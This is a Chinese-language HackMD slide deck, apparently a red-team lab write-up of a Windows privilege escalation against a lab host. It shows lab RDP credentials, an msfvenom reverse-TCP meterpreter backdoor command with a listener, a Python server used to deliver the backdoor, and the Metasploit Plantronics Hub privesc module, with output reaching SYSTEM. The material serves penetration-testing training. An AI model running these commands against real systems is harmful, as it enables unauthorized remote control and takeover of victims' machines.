--- title: 0509-Red-Team-PT # 簡報的名稱 tags: 0509-Red-Team-PT # 簡報的標籤 slideOptions: # spotlight: # enabled: true --- {%hackmd theme-dark %} # 0509-Red-Team-Windows提權 ### Jeff ### 靶機10.99.62.12 ### 1. 3389port可以RDP * 帳：test1 * 密：123456  ### 2. 開始找漏洞提權 * Plantronics Hub 3.13.2版本有漏洞  ### 3. Exploit * (1) msfconsole 必需先獲取session，才能提權 * 先用msfvenom先建立後門程式 ```c= msfvenom -p windows/meterpreter/reverse_tcp lhost=10.99.62.253 lport=9999 -f exe > /tmp/jeff_backdoor.exe ``` * 再上傳到靶機 -> local開Server讓靶機拿backdoor ```c= python -m SimpleHTTPServer 8888 ``` * 靶機再執行後門  * (2) msfconsole 設定handler => 攻擊端開始監聽 ```c= msfconsole -q use /exploit/multi/handler set lhost 10.99.62.253 set lport 9999 run ``` * 結果： ```c= msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.99.62.253 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > set lport 9999 lport => 9999 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.99.62.253:9999 [*] Sending stage (180291 bytes) to 10.99.62.12 [*] Meterpreter session 1 opened (10.99.62.253:9999 -> 10.99.62.12:49990) at 2020-05-09 01:56:49 -0400 meterpreter > sysinfo Computer : DESKTOP-CLHVC1L OS : Windows 10 (10.0 Build 18362). Architecture : x64 System Language : zh_TW Domain : WORKGROUP Logged On Users : 4 Meterpreter : x86/windows meterpreter > getuid Server username: DESKTOP-CLHVC1L\test1 ``` ### 4. 提權： * 學到新技能 * bg(background) => 直接將reverse shell放background ```c= meterpreter > bg [*] Backgrounding session 1... ``` * options => 取代show options * 提升效率XD * 提權漏洞模組：使用msfconsole windows/local/plantronics_hub_spokesupdateservice_privesc * 前置工作 => 找sessions ```c= msf5 exploit(multi/handler) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 meterpreter x86/windows DESKTOP-CLHVC1L\test1 @ DESKTOP-CLHVC1L 10.99.62.253:9999 -> 10.99.62.12:49990 (10.99.62.12) ``` ```c= msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 meterpreter x86/windows DESKTOP-CLHVC1L\test1 @ DESKTOP-CLHVC1L 10.99.62.253:9999 -> 10.99.62.12:49865 (10.99.62.12) msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > show options Module options (exploit/windows/local/plantronics_hub_spokesupdateservice_privesc): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 2 yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.99.62.253 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > run [*] Started reverse TCP handler on 10.99.62.253:4444 [*] Sending stage (180291 bytes) to 10.99.62.12 [*] Meterpreter session 5 opened (10.99.62.253:4444 -> 10.99.62.12:49981) at 2020-05-09 01:49:02 -0400 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > ```